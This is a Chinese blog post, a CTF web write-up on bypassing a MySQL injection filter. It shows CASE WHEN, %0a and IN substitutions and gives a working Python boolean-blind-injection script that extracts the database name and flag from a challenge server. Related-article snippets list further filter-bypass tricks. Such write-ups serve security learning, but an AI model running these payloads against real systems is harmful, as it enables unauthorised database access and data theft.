记一次MySQL注入绕过

于 2021-10-01 15:27:20 发布 1879 收藏 25
分类专栏: CTF_WEB_Writeup 文章标签: Mysql注入绕过 case when绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/120576924
版权

来源于今天一位朋友叫我帮忙看的题目

在这里插入图片描述
查看源码发现提示
在这里插入图片描述
存在过滤且,limit参数只能为单个数字
在这里插入图片描述
在这里插入图片描述
fuzz一下sql注入关键字看看都过滤了哪些字符
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
直接在class参数插入exp(100)回显正常,插入exp(1000)发现返回database error;说明此处sql注入可直接插入执行,其次如果sql语句执行错误会返回报错提示;

那么就可以做布尔盲注了,但是比较棘手的是过滤了逗号,;不能使用if进行条件判断;绕过逗号的方法from x for y不能在if中使用。

  • if无法使用可以用case when [express] then [x] else [y] end代替
  • 空格绕过可以使用括号()或者%0a
  • =likeregexp被过滤可以用in(不过in对字符大小写不敏感)
class=case%0awhen%0a(2)in(1)%0athen%0aexp(1000)else%0a1%0aend&limit=4

在这里插入图片描述
在这里插入图片描述
编写脚本

from urllib.parse import urlencode
from urllib.parse import unquote
import requests


burp0_url = "http://123.60.32.152:80/"
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
all_str = "0123456789abcdefghijklmnopqrstuvwxyz!\"#$%&\\'()*+,-./:;<=>?@[\\]^_`{|}~"


flag = ''
for leng in range(1,50):
	for char in all_str:
		payload = "case%0awhen%0amid(database()from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
		#payload = "case%0awhen%0amid((select%0aflag%0afrom%0aflag)from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:])
		burp0_data = {"class": unquote(payload), "limit": "4"}
		resp = requests.post(burp0_url, headers=burp0_headers, data=urlencode(burp0_data))
		if 'error' in resp.text:
			flag += char
			print(flag)
		else:
			continue
		# print(resp.text)
		# print(resp.request.body)

在这里插入图片描述
得到数据名称:babysql
直接按照前面的提示查flag
在这里插入图片描述

末初mochu7
关注
  • 12
    点赞
  • 25
    收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
mysql注入绕过技术
06-04
mysql注入绕过技术
mysql 注入补丁_mysql注入绕过的一些技巧
weixin_36389335的博客
12-24 108
虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因1.注释绕过select/*comment*/user/*zzsdsdsf*/from mysql.user;2.内联注释绕过/*!12345select*//*!12345user*/ from mysql.user;3.特殊空白字符绕过在php中\s会匹配0x09,0x0a,0x0b,0x0c,0x0d,...
MySQL注入秘籍【绕过篇】
大河之犬的博客
03-22 489
编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。因此任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。因为and和or主要也是起到连接我们拼接语句的作用,那我们找其他类似功能的算术符等即可。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),过滤了等号或者相关的匹配符,可以采用如下的一些手法来绕过。后面的空格需要绕过的话,可以跟上奇或者偶数个。等被过滤,可以使用等价的函数进行绕过,如。
MySQL注入绕过
最新发布
tcsecXD的博客
03-24 32
本文主要结合本人绕过最近某rasp和一些waf的经验,分享绕过waf的思路,MySQL测试版本(8.0.31)。
MySQL注入绕过备忘录
weixin_43610673的博客
04-25 4562
SQL注入(以Mysql为例) 大致分为有回显和无回显两类进行梳理,重心会放在盲注这一块,正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演示,在challenges数据库中在添加一个flag数据库表,并修改sql-labs源码使其回显执行的sql语句,方便演示。 判断是否存在SQL注入 本质都是看页面是否出现异常 加单引号’、双引号”、单括号)、双括号))或者进行组合看看是否报错(字符型)。 服务器不返回报错信息时,加 and 1=1 、 and 1=2 看页面是否有变化(数字型),字符型
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 6936
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
mysql报错注入_项目实战 | 报错SQL注入绕过WAF
weixin_33560311的博客
01-01 210
文章来源:安译Sec报错的存在一个有趣的点:http://domain.com/xxx/news.php?id=xxx打开URL时,遇到了MySQL错误。Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27访问端点时出现MySQL错误我们知道可以执行一些基...
mysql 注入 绕过,渗透测试:一次绕过简单SQL防注入爆菊(mysql)
weixin_42362885的博客
03-17 97
转自:http://www.cnseay.com/2418/目标站用www.cnseay.com代替。打开网站,点开一个产品页面。在?id=62后面加单引号,如下图判断出参数id无单引号保护,且GPC开启,无单引号就好办多了。不过经测试,发现以下问题:1、常用注入关键字union、select、from、星号(*)、等号等均被替换为空。2、参数被多条SQL语句使用,只能用第一条语句双查询报错注入...
MySQL注入 绕过去除注释符
m_de_g的博客
12-08 1364
MySQL注入 绕过去除注释符 1.MySQL中的注释符 注释符的作用:用于标某段代码的作用,起到对代码功能的说明作用,但是注释掉的内容不会被执行。 MySQL中的注释符: 1.单行注释:--+或--空格或# 2.对行注释:/*多行注释内容*/ 对于正常的SQL语句中,注释符起到说明作用的功能。但是对于在利用SQL注入漏洞过程中,注释符起到闭合单引号、多引号、双引号、单括号、多括号的功能。 2.去除注释符的代码分析 preg_replace(mixed $pattern,mixed $replacemen
mysql 注入 waf_项目实战 | 报错SQL注入绕过WAF
weixin_33040687的博客
02-07 192
文章来源:安译Sec报错的存在一个有趣的点:http://domain.com/xxx/news.php?id=xxx打开URL时,遇到了MySQL错误。Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27访问端点时出现MySQL错误我们知道可以执行一些基于布尔的查...
Mysql如何巧妙的绕过未知字段名详解
09-09
主要给大家介绍了Mysql如何巧妙的绕过未知字段名的相关资料,文中给出了详细的示例代码供大家参考学习,对学习mysql具有一定的参考学习价值,需要的朋友们下面来一起看看吧。
SQL注入绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
MySQL注入绕开过滤的技巧总结
12-16
使用注释/**/绕过空格; select * from/**/users/**/where id=1; 情况二:限制from与某种字符组合 在from后加个点.即使用from.来代替from; select * from. users where id=1; 再直接看GIF: 说白了,就是将...
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
实验一:使用SQL注入绕过认证 一、实验目的 使用SQL注入绕过认证 熟悉掌握常见的绕过方式 二、实验内容 本实验使用SQL注入绕过认证,其中包含注释符绕过、大小写绕过、特殊编码绕过、内联注释绕过等方式。 三、实验...
多列复合索引的使用 绕过微软sql server的一个缺陷
01-19
然而,微软sql server在处理这类索引时,有个重要的缺陷,那就是把本该编译成索引seek的操作编成了索引扫描,这可能导致严重性能下降 举个例子来说明问题,假设某个表T有索引 ( cityid, sentdate, userid), 现在有个...
waf怎么防护mysql信息泄露_WAF攻击与防御
weixin_31411427的博客
02-01 316
背景对于腾讯的业务来说,有两个方面决定着WAF能否发挥效果,一个是合适处理海量流量的架构,另一个关键因素则是规则系统。架构决定着WAF能否承受住海量流量的挑战,这个在之前的篇章中简单介绍过(详情见主流WAF架构分析与探索、WAF应用层实现的架构漫谈)。而规则系统则决定着WAF能否发挥完善的防护功能。SQL注入是由于开发人员没有对用户的输入进行相关的过滤,而使用户的输入可以被带入到SQL语句中执行,...
mysql注入过滤逗号_SQL注入绕过的技巧总结
weixin_42488542的博客
02-02 1542
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章...
Mysql注入绕过姿势
aiquan9342的博客
11-25 122
1.内联绕过 2.编码绕过,如URLEncode编码,ASCII,HEX,unicode编码绕过 or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 十六进制编码 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)...
mysql 一页能存储多少条
02-22
MySQL 中没有固定的限制,一页能存储多少条录完全取决于你设置的页面大小,以及每条录的大小。页面大小是 MySQL 的服务器参数,你可以在启动服务器时通过命令行或者配置文件设置。默认情况下,MySQL 的页面大小是 16KB,但你也可以设置为其他值,比如 8KB 或者 32KB。 在计算一页能存储多少条录时,还需要考虑每条录的大小。每条录的大小取决于你的表结构,每个字段的类型和长度,以及行录的元数据(比如录的创建时间、修改时间等)。 例如,如果你的表有 5 个字段,每个字段的类型均为 INT(4 字节),那么每条录的大小就是 5 * 4 = 20 字节。如果你的页面大小为 16KB,那么一页能存储的录数就是 16KB / 20 字节/条 = 8192 条录。 注意,这是理论值,在实际使用中,由于行录的元数据和页面的其他结构,一页实际能存储的录数可能要少于理论值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

谢谢老板!

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值